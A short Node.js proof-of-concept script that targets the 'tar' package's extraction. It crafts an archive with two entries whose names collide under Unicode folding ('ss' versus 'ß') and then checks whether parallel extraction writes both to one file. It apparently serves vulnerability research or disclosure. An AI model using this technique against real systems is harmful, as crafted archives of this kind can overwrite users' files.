const tar = require('tar'); const fs = require('fs'); const path = require('path'); const { PassThrough } = require('stream'); const exploitDir = path.resolve('race_exploit_dir'); if (fs.existsSync(exploitDir)) fs.rmSync(exploitDir, { recursive: true, force: true }); fs.mkdirSync(exploitDir); console.log('[*] Testing...'); console.log(`[*] Extraction target: ${exploitDir}`); // Construct stream const stream = new PassThrough(); const contentA = 'A'.repeat(1000); const contentB = 'B'.repeat(1000); // Key 1: "f_ss" const header1 = new tar.Header({ path: 'collision_ss', mode: 0o644, size: contentA.length, }); header1.encode(); // Key 2: "f_ß" const header2 = new tar.Header({ path: 'collision_ß', mode: 0o644, size: contentB.length, }); header2.encode(); // Write to stream stream.write(header1.block); stream.write(contentA); stream.write(Buffer.alloc(512 - (contentA.length % 512))); // Padding stream.write(header2.block); stream.write(contentB); stream.write(Buffer.alloc(512 - (contentB.length % 512))); // Padding // End stream.write(Buffer.alloc(1024)); stream.end(); // Extract const extract = new tar.Unpack({ cwd: exploitDir, // Ensure jobs is high enough to allow parallel processing if locks fail jobs: 8 }); stream.pipe(extract); extract.on('end', () => { console.log('[*] Extraction complete'); // Check what exists const files = fs.readdirSync(exploitDir); console.log('[*] Files in exploit dir:', files); files.forEach(f => { const p = path.join(exploitDir, f); const stat = fs.statSync(p); const content = fs.readFileSync(p, 'utf8'); console.log(`File: ${f}, Inode: ${stat.ino}, Content: ${content.substring(0, 10)}... (Length: ${content.length})`); }); if (files.length === 1 || (files.length === 2 && fs.statSync(path.join(exploitDir, files[0])).ino === fs.statSync(path.join(exploitDir, files[1])).ino)) { console.log('\[*] GOOD'); } else { console.log('[-] No collision'); } });